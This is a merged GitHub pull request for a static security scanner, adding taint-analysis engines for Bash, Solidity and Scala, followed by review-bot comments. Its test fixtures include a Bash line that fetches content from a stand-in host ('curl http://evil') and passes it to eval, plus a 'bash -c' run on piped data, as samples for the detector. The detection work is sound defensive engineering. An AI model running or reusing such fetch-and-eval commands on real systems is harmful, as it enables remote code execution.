Skip to content

feat(taint): Scala/Solidity/Bash taint engines (→ 92.4%)#530

Merged
peaktwilight merged 1 commit into
mainfrom
feat/taint-scala-solidity-bash
Jun 18, 2026
Merged

feat(taint): Scala/Solidity/Bash taint engines (→ 92.4%)#530
peaktwilight merged 1 commit into
mainfrom
feat/taint-scala-solidity-bash

Conversation

@peaktwilight

@peaktwilight peaktwilight commented Jun 18, 2026

Copy link
Copy Markdown
Collaborator

Taint engines for Scala, Solidity, Bash → load rate 92.0% → 92.4%

Adds three new mode: taint engines, mirroring the existing ruby/php/csharp engines on the shared taint_engine.rs framework. Their tree-sitter grammars were already wired (rounds 7-8); these rules were blocked solely on a missing taint engine.

Language Rules unblocked Δ
Scala tainted-sql-from-http-request, tainted-html-response, tainted-slick-sqli, tainted-sql-string, scalajs-eval +5 (5/5)
Bash curl-eval, hooks-path-traversal-bash, hooks-unquoted-variable-bash-taint +3 (3/3)
Solidity delegatecall-to-arbitrary-address, accessible-selfdestruct +2 (2/3; basic-arithmetic-underflow is shape-co-blocked on a pattern-inside-only source, not language-blocked — honest)

All three mode: taint (unsupported language: …) buckets → 0.

Results (independently re-measured)

before after
Load rate 92.0% (1972) 92.4% (1982)

Verification (re-run on the branch)

  • registry_coverage → 92.4% / all three buckets gone ✓
  • both dogfood scans exit 0 · cargo test 1105 passed, 0 failed · clippy -D warnings clean · fmt --check clean · baseline + Cargo.toml untouched ✓
  • Bridge-level tests for each engine (parse_taint_rule → compiled rule.check() — the exact scanner.rs:74 per-file entrypoint, NOT analyze_tree): curl-eval/scala-SQLi/delegatecall/selfdestruct fire on real registry rule patterns; safe near-misses (literal-only concat, delegatecall-to-self, clean eval) don't. API surface confirmed identical to the ruby template.

Summary by CodeRabbit

  • New Features

    • Enabled taint analysis capabilities for Bash, Scala, and Solidity programming languages
  • Documentation

    • Updated registry parity metrics showing improved coverage rate (92.4% headline loader load)
    • Refined language-specific capability tracking and coverage reports

Wire three new language taint engines into the Semgrep taint bridge,
mirroring the Ruby/PHP/C# templates and the shared taint_engine framework.

- bash_taint: command / command-substitution flow (top-level + functions);
  curl/jq/cat sources -> eval/bash -c/sh -c sinks; realpath sanitizer.
- solidity_taint: function-parameter (address) sources -> delegatecall
  (tainted receiver) and selfdestruct/suicide (tainted arg) sinks.
- scala_taint: request-parameter sources -> SQL string-building (infix /
  interpolated) and method-name (eval/execute/append/overrideSql) sinks.

Bridge (semgrep_taint.rs): thread Language through the pattern compiler;
add compile_bash_pattern (shell command -> Call matcher) and a
function-signature source compiler (-> any-parameter seed) for Solidity/
Scala; strip Solidity statement-terminating `;`. Add to_*_spec/matcher,
TaintFindingView::from_*, dispatch arms, and scala/solidity/bash/sh/shell/
sol language detection. Update registry_coverage taint_language_supported.

Each engine has unit tests plus BRIDGE-LEVEL tests (parse_taint_rule ->
Compiled -> check on a real vulnerable fixture fires; a safe near-miss does
not), using the actual registry rule YAML shapes.

Registry coverage: 92.0% (1972) -> 92.4% (1982). Unblocks all 5 scala and
3 bash taint rules and 2 of 3 solidity (delegatecall, selfdestruct). The
remaining basic-arithmetic-underflow is co-blocked: its source is a
pattern-inside-only block that yields no expressible matcher.
@peaktwilight peaktwilight merged commit 38ed1f2 into main Jun 18, 2026
17 checks passed
@peaktwilight peaktwilight deleted the feat/taint-scala-solidity-bash branch June 18, 2026 16:22
@coderabbitai

coderabbitai Bot commented Jun 18, 2026

Copy link
Copy Markdown

Review Change Stack

Caution

Review failed

The pull request is closed.

ℹ️ Recent review info
⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro Plus

Run ID: ac94ad52-9647-4951-87d1-21af8c4737a9

📥 Commits

Reviewing files that changed from the base of the PR and between 9f91a79 and 3ba4377.

📒 Files selected for processing (7)
  • docs/parity/registry-coverage.md
  • src/bin/registry_coverage.rs
  • src/rules/bash_taint.rs
  • src/rules/mod.rs
  • src/rules/scala_taint.rs
  • src/rules/semgrep_taint.rs
  • src/rules/solidity_taint.rs

📝 Walkthrough

Walkthrough

Three new intraprocedural, flow-insensitive taint analysis engines are added for Bash, Solidity, and Scala. Each engine is registered as a public module, integrated into the Semgrep YAML taint bridge (semgrep_taint.rs) via language detection, per-language pattern compilation, spec conversion, and dispatch. The registry coverage classifier whitelist and the parity coverage document are updated to reflect the newly supported languages.

Changes

Bash / Solidity / Scala Taint Engine Addition

Layer / File(s) Summary
New taint engines: Bash, Solidity, Scala
src/rules/mod.rs, src/rules/bash_taint.rs, src/rules/solidity_taint.rs, src/rules/scala_taint.rs
Three new files each export analyze_tree implementing per-function, flow-insensitive taint propagation with parameter seeding, assignment/declaration handling, sink/sanitizer matching, and comprehensive unit tests. All three are registered as public modules in mod.rs.
Semgrep YAML bridge: language detection, pattern compiler, dispatch
src/rules/semgrep_taint.rs
parse_taint_rule recognizes bash/sh/shell, solidity/sol, and scala; compile_pattern gains a lang parameter enabling language-specific GenericMatcher compilation (Bash command patterns → Call, Solidity/Scala function signatures → ParamName); GenericSpec→engine TaintSpec conversion functions and TaintFindingView constructors are added; check_with_context routes the three new languages to their analyze_tree implementations. Bridge-level end-to-end tests are included.
Coverage classifier whitelist and parity docs
src/bin/registry_coverage.rs, docs/parity/registry-coverage.md
taint_language_supported in registry_coverage.rs is extended to accept bash/sh/shell/solidity/sol/scala. The parity coverage document is regenerated showing the updated load rate (92.4%), skip counts, and per-language breakdown.

Sequence Diagram(s)

sequenceDiagram
  rect rgba(173, 216, 230, 0.5)
    Note over parse_taint_rule,compile_pattern: YAML Rule Parsing
    participant parse_taint_rule
    participant compile_matcher_list
    participant compile_pattern
    parse_taint_rule->>compile_matcher_list: pattern-sources/sinks/sanitizers + lang
    compile_matcher_list->>compile_pattern: pattern text, role, lang
    compile_pattern-->>compile_matcher_list: GenericMatcher::Call or ParamName
    compile_matcher_list-->>parse_taint_rule: GenericSpec
  end
  rect rgba(144, 238, 144, 0.5)
    Note over check_with_context,scala_taint: Runtime Dispatch
    participant check_with_context
    participant bash_taint
    participant solidity_taint
    participant scala_taint
    check_with_context->>bash_taint: GenericSpec→TaintSpec, analyze_tree (Bash AST)
    bash_taint-->>check_with_context: Vec<TaintFinding>
    check_with_context->>solidity_taint: GenericSpec→TaintSpec, analyze_tree (Solidity AST)
    solidity_taint-->>check_with_context: Vec<TaintFinding>
    check_with_context->>scala_taint: GenericSpec→TaintSpec, analyze_tree (Scala AST)
    scala_taint-->>check_with_context: Vec<TaintFinding>
  end
Loading

Estimated code review effort

🎯 5 (Critical) | ⏱️ ~120 minutes

Possibly related PRs

  • 0sec-labs/foxguard#492: Extends the same semgrep_taint.rs dispatch and TaintSpec conversion path for a different language (Java), using the identical pattern of per-language check_with_context routing.
  • 0sec-labs/foxguard#506: Modifies compile_entry/compile_patterns_block in semgrep_taint.rs and the taint_language_supported classifier in registry_coverage.rs, the same functions this PR refactors to thread lang through pattern compilation.
  • 0sec-labs/foxguard#514: Adds PHP taint support via the same three-file pattern (*_taint.rs engine, mod.rs registration, semgrep_taint.rs bridge dispatch, registry_coverage.rs whitelist) used in this PR.

Poem

🐇 Hippity-hop through the AST trees,
Bash, Solidity, Scala — taint flows with ease!
Commands and delegates, sinks in a row,
Parameters seeded wherever we go.
The coverage climbs to ninety-two-four,
Three languages tamed — who could ask for more? 🎉

✨ Finishing Touches
📝 Generate docstrings
  • Create stacked PR
  • Commit on current branch
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Commit unit tests in branch feat/taint-scala-solidity-bash

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

Comment thread src/rules/bash_taint.rs
}

fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> {
let tree = parse_file(src, Language::Bash).expect("parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

Comment thread src/rules/scala_taint.rs
use crate::Language;

fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> {
let tree = parse_file(src, Language::Scala).expect("parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

assert_eq!(rule.lang, Language::Bash);

let src = "out=$(curl http://evil)\neval \"$out\"\n";
let tree = parse_file(src, Language::Bash).expect("bash fixture should parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

);

let src = "out=\"ls -la\"\neval \"$out\"\n";
let tree = parse_file(src, Language::Bash).expect("bash fixture should parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

);

let src = "data=$(cat | jq -r '.path')\nbash -c \"$data\"\n";
let tree = parse_file(src, Language::Bash).expect("bash fixture should parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Solidity).expect("solidity fixture should parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Scala).expect("scala fixture should parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Scala).expect("scala fixture should parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

}
}
"#;
let tree = parse_file(src, Language::Scala).expect("scala fixture should parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

use crate::Language;

fn run(src: &str, spec: &TaintSpec) -> Vec<TaintFinding> {
let tree = parse_file(src, Language::Solidity).expect("parse");

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

foxguard · MEDIUM · rs/no-unwrap-in-lib (CWE-248)

.expect() can panic at runtime — use proper error handling with ? or match

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant